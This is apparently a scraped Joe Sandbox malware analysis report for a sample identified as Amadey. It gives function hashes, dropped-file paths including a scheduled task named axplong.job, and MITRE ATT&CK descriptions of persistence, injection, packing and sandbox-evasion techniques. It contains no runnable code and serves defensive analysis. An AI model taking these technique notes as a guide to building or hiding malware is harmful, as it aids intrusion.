Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
Instruction Fuzzy Hash: 10B14C32A222459FDB15CF28C8827BEBBF5EF55340F1891AAD885EB341D6349D41CB70

Function 00D2BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00D2BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00D2BB14
_xtime_get.LIBCPMT ref: 00D2BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00D2BB43

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 4051508c5dc29552be1460779c79991f8e619a8360af0dbb3be8cfd8dc743598
Instruction ID: 1b82d61268b72743cc10981cf8a50995419e0b0ced5c4abc12e1c54eefa58f0a
Opcode Fuzzy Hash: 4051508c5dc29552be1460779c79991f8e619a8360af0dbb3be8cfd8dc743598
Instruction Fuzzy Hash: F6213271E112299FDF10EFA4EC419BEBBB8EF58718F100066F501A7251DB70AD418BB1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

C:\Windows\Tasks\axplong.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
file.exe

Function 00D1BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Function 00D15DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00D17D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 00D46E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 00D182B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 00D46C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00D46F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 00D26AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Function 04F30D7B Relevance: .1, Instructions: 71
COMMON

Function 04F30D84 Relevance: .1, Instructions: 67
COMMON